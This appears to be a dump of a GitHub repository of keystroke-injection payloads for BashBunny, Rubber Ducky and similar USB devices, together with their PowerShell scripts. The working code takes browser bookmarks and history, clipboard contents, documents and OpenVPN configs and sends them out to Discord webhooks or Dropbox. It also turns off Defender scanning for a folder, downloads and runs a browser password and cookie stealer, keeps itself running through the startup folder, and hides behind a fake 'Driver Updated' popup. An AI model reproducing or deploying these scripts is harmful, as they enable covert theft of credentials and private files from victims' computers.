Repository: atomiczsec/My-Payloads Branch: main Commit: 5f1da98a457a Files: 224 Total size: 316.5 KB Directory structure: gitextract_2ly3q691/ ├── Assets/ │ └── placeholder ├── BashBunny/ │ └── payloads/ │ ├── Bookmark-Hog/ │ │ ├── BBB.ps1 │ │ ├── README.md │ │ ├── payload.txt │ │ └── placeholder │ ├── Browser-Grab/ │ │ ├── README.md │ │ ├── b.ps1 │ │ └── payload.txt │ ├── Copy-And-Waste/ │ │ ├── I.bat │ │ ├── README.md │ │ ├── c.ps1 │ │ ├── payload.txt │ │ └── placeholder │ ├── De-Bloater/ │ │ ├── README.md │ │ └── payload.txt │ ├── Doc-Hog/ │ │ ├── d.ps1 │ │ ├── payload.txt │ │ └── readme.md │ ├── History-Pig/ │ │ ├── HP.ps1 │ │ ├── README.md │ │ └── payload.txt │ ├── OVPN-Hog/ │ │ ├── o.ps1 │ │ ├── payload.txt │ │ └── readme.md │ ├── Powershell-History/ │ │ ├── PH.ps1 │ │ ├── README.md │ │ └── payload.txt │ ├── Printer-Recon/ │ │ ├── PR.ps1 │ │ ├── README.md │ │ └── payload.txt │ ├── Priv-Paths/ │ │ ├── README.md │ │ └── payload.txt │ ├── Proton-Hog/ │ │ ├── README.md │ │ ├── payload.txt │ │ └── s.ps1 │ ├── Pwn-Drive/ │ │ ├── README.md │ │ ├── c.ps1 │ │ └── payload.txt │ ├── RanFunWare/ │ │ ├── README.md │ │ ├── payload.txt │ │ └── r.ps1 │ ├── Screen-Shock/ │ │ ├── I.bat │ │ ├── README.md │ │ ├── c.ps1 │ │ ├── payload.txt │ │ └── placeholder │ ├── Spotify-Spy/ │ │ ├── README.md │ │ ├── SS.ps1 │ │ └── payload.txt │ ├── Water-UnMark/ │ │ ├── README.md │ │ ├── payload.txt │ │ └── placeholder │ ├── cApS-Troll/ │ │ ├── README.md │ │ ├── a.ps1 │ │ └── payload.txt │ └── placeholder ├── FlipperZero/ │ └── payloads/ │ ├── Bookmark-Hog/ │ │ ├── BH.ps1 │ │ ├── README.md │ │ └── payload.txt │ ├── Browser-Devil/ │ │ └── Browser-Devil/ │ │ ├── README.md │ │ ├── b.ps1 │ │ └── payload.txt │ ├── Copy-And-Waste/ │ │ ├── I.bat │ │ ├── README.md │ │ ├── c.ps1 │ │ ├── payload.txt │ │ └── placeholder │ ├── De-Bloater/ │ │ ├── README.md │ │ ├── payload.txt │ │ └── placeholder │ ├── Doc-Hog/ │ │ ├── d.ps1 │ │ ├── payload.txt │ │ └── readme.md │ ├── History-Pig/ │ │ ├── HP.ps1 │ │ ├── README.md │ │ └── payload.txt │ ├── OVPN-Hog/ │ │ ├── o.ps1 │ │ ├── payload.txt │ │ └── readme.md │ ├── Powershell-History/ │ │ ├── PH.ps1 │ │ ├── README.md │ │ └── payload.txt │ ├── Printer-Recon/ │ │ ├── PR.ps1 │ │ ├── README.md │ │ └── payload.txt │ ├── Priv-Paths/ │ │ ├── README.md │ │ └── payload.txt │ ├── Proton-Hog/ │ │ ├── README.md │ │ ├── payload.txt │ │ └── s.ps1 │ ├── Pwn-Drive/ │ │ ├── README.md │ │ ├── c.ps1 │ │ └── payload.txt │ ├── RanFunWare/ │ │ ├── README.md │ │ ├── payload.txt │ │ └── r.ps1 │ ├── Screen-Shock/ │ │ ├── I.bat │ │ ├── README.md │ │ ├── c.ps1 │ │ ├── payload.txt │ │ └── placeholder │ ├── Spotify-Spy/ │ │ ├── README.md │ │ ├── SS.ps1 │ │ └── payload.txt │ ├── Water-UnMark/ │ │ ├── README.md │ │ ├── payload.txt │ │ └── placeholder │ └── cApS-Troll/ │ ├── README.md │ ├── a.ps1 │ └── payload.txt ├── Functions/ │ ├── placeholder │ └── tidal-log.ps1 ├── OMG/ │ └── payloads/ │ ├── Bookmark-Hog/ │ │ ├── BH.ps1 │ │ ├── README.md │ │ ├── payload.txt │ │ └── placeholder │ ├── Browser-Grab/ │ │ ├── README.md │ │ ├── b.ps1 │ │ └── payload.txt │ ├── Copy-And-Waste/ │ │ ├── I.bat │ │ ├── README.md │ │ ├── c.ps1 │ │ ├── payload.txt │ │ └── placeholder │ ├── De-Bloater/ │ │ ├── README.md │ │ └── payload.txt │ ├── Doc-Hog/ │ │ ├── d.ps1 │ │ ├── payload.txt │ │ └── readme.md │ ├── History-Pig/ │ │ ├── HP.ps1 │ │ ├── README.md │ │ └── payload.txt │ ├── OVPN-Hog/ │ │ ├── o.ps1 │ │ ├── payload.txt │ │ └── readme.md │ ├── Powershell-History/ │ │ ├── PH.ps1 │ │ ├── README.md │ │ └── payload.txt │ ├── Printer-Recon/ │ │ ├── PR.ps1 │ │ ├── README.md │ │ └── payload.txt │ ├── Priv-Paths/ │ │ ├── README.md │ │ └── payload.txt │ ├── Proton-Hog/ │ │ ├── README.md │ │ ├── payload.txt │ │ └── s.ps1 │ ├── Pwn-Drive/ │ │ ├── README.md │ │ ├── c.ps1 │ │ └── payload.txt │ ├── RanFunWare/ │ │ ├── README.md │ │ ├── payload.txt │ │ └── r.ps1 │ ├── Screen-Shock/ │ │ ├── I.bat │ │ ├── README.md │ │ ├── c.ps1 │ │ ├── payload.txt │ │ └── placeholder │ ├── Spotify-Spy/ │ │ ├── README.md │ │ ├── SS.ps1 │ │ └── payload.txt │ ├── Water-UnMark/ │ │ ├── README.md │ │ ├── payload.txt │ │ └── placeholder │ ├── cApS-Troll/ │ │ ├── README.md │ │ ├── a.ps1 │ │ └── payload.txt │ └── placeholder ├── README.md └── RubberDucky/ └── payloads/ ├── Bookmark-Hog/ │ ├── BH.ps1 │ ├── README.md │ └── payload.txt ├── Browser-Grab/ │ ├── README.md │ ├── b.ps1 │ └── payload.txt ├── Copy-And-Waste/ │ ├── I.bat │ ├── README.md │ ├── c.ps1 │ ├── payload.txt │ └── placeholder ├── De-Bloater/ │ ├── README.md │ └── payload.txt ├── Doc-Hog/ │ ├── d.ps1 │ ├── payload.txt │ └── readme.md ├── History-Pig/ │ ├── HP.ps1 │ ├── README.md │ └── payload.txt ├── OVPN-Hog/ │ ├── o.ps1 │ ├── payload.txt │ └── readme.md ├── Picture-Hog/ │ ├── p.ps1 │ └── placeholder ├── Powershell-History/ │ ├── PH.ps1 │ ├── README.md │ └── payload.txt ├── Printer-Recon/ │ ├── PR.ps1 │ ├── README.md │ └── payload.txt ├── Priv-Paths/ │ ├── README.md │ └── payload.txt ├── Proton-Hog/ │ ├── README.md │ ├── payload.txt │ └── s.ps1 ├── Pwn-Drive/ │ ├── README.md │ ├── c.ps1 │ └── payload.txt ├── RanFunWare/ │ ├── README.md │ ├── payload.txt │ └── r.ps1 ├── Screen-Shock/ │ ├── I.bat │ ├── README.md │ ├── c.ps1 │ ├── payload.txt │ └── placeholder ├── Spotify-Spy/ │ ├── README.md │ ├── SS.ps1 │ └── payload.txt ├── Water-UnMark/ │ ├── README.md │ ├── payload.txt │ └── placeholder ├── cApS-Troll/ │ ├── README.md │ ├── a.ps1 │ └── payload.txt └── placeholder ================================================ FILE CONTENTS ================================================ ================================================ FILE: Assets/placeholder ================================================ ================================================ FILE: BashBunny/payloads/Bookmark-Hog/BBB.ps1 ================================================ #Bookmark-Hog # Get Drive Letter $bb = (gwmi win32_volume -f 'label=''BashBunny''').Name # Test if directory exists if not create directory in loot folder to store file $TARGETDIR = "$bb\loot\Bookmark-Hog\$env:computername\Chromebm.txt" $TARGETDIR2 = "$bb\loot\Bookmark-Hog\$env:computername\Edgebm.txt" if(!(Test-Path -Path $TARGETDIR )){ mkdir $TARGETDIR } # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -PathType Leaf)) { try { Write-Host "The chrome bookmark file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome Bookmarks to Bash Bunny else { Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/Bookmarks" -Destination "$TARGETDIR" } # See if file is a thing Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2" #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -PathType Leaf)) { try { Write-Host "The edge bookmark file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome Bookmarks to Bash Bunny else { Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$TARGETDIR2" } ================================================ FILE: BashBunny/payloads/Bookmark-Hog/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Bookmark-Hog A payload to exfiltrate bookmarks of the 2 most popular browsers ## Description This payload will enumerate through the browser directories, looking for the file that stores the bookmark history These files will be saved to the bash bunny in the loot directory ## Getting Started ### Dependencies * Windows 10,11

(back to top)

### Executing program * Plug in your device * Let the magic happen

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/Bookmark-Hog/payload.txt ================================================ # Title: Bookmark-Hog # Description: This payload is meant to exfiltrate bookmarks to the bash bunny. # Author: atomiczsec # Version: 1.0 # Category: Exfiltration # Attackmodes: HID, Storage # Target: Windows 10, 11 LED SETUP GET SWITCH_POSITION ATTACKMODE HID STORAGE LED STAGE1 QUACK DELAY 3000 QUACK GUI r QUACK DELAY 100 LED STAGE2 QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\BBB.ps1')" QUACK ENTER ================================================ FILE: BashBunny/payloads/Bookmark-Hog/placeholder ================================================ ================================================ FILE: BashBunny/payloads/Browser-Grab/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Browser-Grab A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers ## Description This payload will exclude the C: drive on the device so Windows Defender doesnt flag the exe This payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers Finally, discord will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Admin privileges on the Device you are targeting * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/Browser-Grab/b.ps1 ================================================ function Upload-Discord { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'YOUR-DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))){ Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} } # Add $env:tmp to exlusions so Windows Defender doesnt flag the exe we will download Add-MpPreference -ExclusionPath $env:tmp # Download the exe and save it to temp directory iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe" # Execute the Browser Stealer cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait # Exfiltrate the loot to discord Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip Upload-Discord -file "$env:tmp\browserdata.zip" ================================================ FILE: BashBunny/payloads/Browser-Grab/payload.txt ================================================ REM Title: Browser-Grab REM Author: atomiczsec REM Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers REM Target: Windows 10 Q DELAY 2000 Q GUI r Q DELAY 1000 Q STRING powershell start-process powershell -verb runas Q ENTER Q DELAY 1000 Q ALT y Q DELAY 1000 Q STRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex Q ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly ================================================ FILE: BashBunny/payloads/Copy-And-Waste/I.bat ================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: BashBunny/payloads/Copy-And-Waste/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Copy-And-Waste A payload to exfiltrate clipboard contents ## Description This payload uses iwr to download 2 files * I.bat * c.ps1 **I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup **c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click Then the contents will then be sent to the discord webhook for viewing pleasure For killing the script press both Ctrl buttons at the same time [It will resume at reboot] ## Getting Started ### Dependencies * Pastebin or other file sharing service, Discord webhook or other webhook service * Windows 10,11 * [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

(back to top)

### Executing program * Plug in your device * Device will download both files and place them in proper directories to then run the script ``` powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/Copy-And-Waste/c.ps1 ================================================ Add-Type -AssemblyName WindowsBase Add-Type -AssemblyName PresentationCore function dischat { [CmdletBinding()] param ( [Parameter (Position=0,Mandatory = $True)] [string]$con ) $hookUrl = 'YOUR DISCORD WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $con } Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body } dischat (get-clipboard) while (1){ $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl') $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl) $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c) $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x) if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)} elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit} else {continue} } ================================================ FILE: BashBunny/payloads/Copy-And-Waste/payload.txt ================================================ REM Title: Copy-And-Waste REM Author: atomiczsec & I am Jakoby REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook REM Target: Windows 10, 11 DELAY 2000 GUI DELAY STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH ================================================ FILE: BashBunny/payloads/Copy-And-Waste/placeholder ================================================ ================================================ FILE: BashBunny/payloads/De-Bloater/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# De-Bloater A payload to quickly get "Windows10Debloater" ## Description This script will download "Windows10Debloater" - Script/Utility/Application to debloat Windows 10, to remove Windows pre-installed unnecessary applications, stop some telemetry functions, stop Cortana from being used as your Search Index, disable unnecessary scheduled tasks, and more... ## Getting Started ### Dependencies * Windows 10

(back to top)

### Executing program * Plug in your device ``` iwr -useb https://git.io/debloat|iex ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec) [Sycnex](https://github.com/Sycnex/Windows10Debloater) [I am Jakoby](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby) * [Sycnex - Creator Of The Tool](https://github.com/Sycnex/Windows10Debloater)

(back to top)

================================================ FILE: BashBunny/payloads/Doc-Hog/d.ps1 ================================================ function Doc-Hog { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))) { Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json) } if (-not ([string]::IsNullOrEmpty($file))) { curl.exe -F "file1=@$file" $hookurl } } $Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse $types = @{ "*.docx" = "Word"; "*.doc" = "Word"; "*.pptx" = "PowerPoint"; "*.xlsx" = "Excel"; "*.pdf" = "PDF"; "*.jpeg" = "JPEG"; "*.png" = "PNG"; "*.jpg" = "JPEG"; "*.csv" = "CSV"; "*.txt" = "Text"; } foreach ($type in $types.Keys) { $filteredFiles = $Files | Where-Object {$_.Name -like $type} if ($filteredFiles) { $zipFile = "$env:TEMP\$($types[$type]).zip" $filteredFiles | Compress-Archive -DestinationPath $zipFile Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files" } } ================================================ FILE: BashBunny/payloads/Doc-Hog/payload.txt ================================================ REM Title: Doc-Hog REM Author: atomiczsec REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook. DEFINE URL http://new-url.com/powershell.ps1 REM Target: Windows 10 QUACK DELAY 2000 QUACK GUI r QUACK DELAY 500 QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl QUACK ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/Doc-Hog/readme.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Doc-Hog A payload to exfiltrate all files like, PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV ## Description This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook. ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact
Link

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/History-Pig/HP.ps1 ================================================ #History-Pig # See if file is a thing Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) { try { Write-Host "The Chrome History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome History to Temp Directory to get sent to Dropbox else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history" Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1" } # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) { try { Write-Host "The Edge History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Edge History to Temp Directory to get sent to Dropbox else { $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history" Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" DropBox-Upload -f "$env:tmp/$F2" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: BashBunny/payloads/History-Pig/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# History-Pig A payload to exfiltrate the history of the 2 most popular browsers ## Description This payload will enumerate through the browser directories, looking for the file that stores the history These files will be saved to the temp directory Finally dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/History-Pig/payload.txt ================================================ REM Title: History-Pig REM Author: atomiczsec REM Description: This payload is meant to exfiltrate browsers history to a dropbox REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/OVPN-Hog/o.ps1 ================================================ function OVPN-Hog { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))) { Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json) } if (-not ([string]::IsNullOrEmpty($file))) { curl.exe -F "file1=@$file" $hookurl } } $Drive = "C:" $Files = Get-ChildItem -Path $Drive -Filter "*.ovpn" -File -Recurse if ($Files) { $types = @{ "*.ovpn" = "OpenVPN" } foreach ($type in $types.Keys) { $filteredFiles = $Files | Where-Object { $_.Name -like $type } if ($filteredFiles) { $zipFile = Join-Path -Path $env:TEMP -ChildPath "$($types[$type]).zip" $filteredFiles | Compress-Archive -DestinationPath $zipFile OVPN-Hog -file $zipFile -text "Uploading $($types[$type]) files" } } } ================================================ FILE: BashBunny/payloads/OVPN-Hog/payload.txt ================================================ REM Title: Doc-Hog REM Author: atomiczsec REM Description: This payload will enumerate through the files looking for ".ovpn" files. Then create ZIPs with them, then send to a discord webhook. REM Target: Windows 10 QUACK DELAY 2000 QUACK GUI r QUACK DELAY 500 QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < URL HERE > dl=1; iex $pl QUACK ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: BashBunny/payloads/OVPN-Hog/readme.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# OVPN-Hog A PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn). ## Description This script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook. ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact
Link

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: BashBunny/payloads/Powershell-History/PH.ps1 ================================================ #Powershell-History # See if file is a thing Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf)) { try { Write-Host "The Powershell History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Powershell History to Temp Directory to get sent to Dropbox else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt" Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination "$env:tmp/$F1" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: BashBunny/payloads/Powershell-History/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Powershell-History A payload to exfiltrate the history of the powershell console ## Description This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console These files will be saved to the temp directory Finally dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

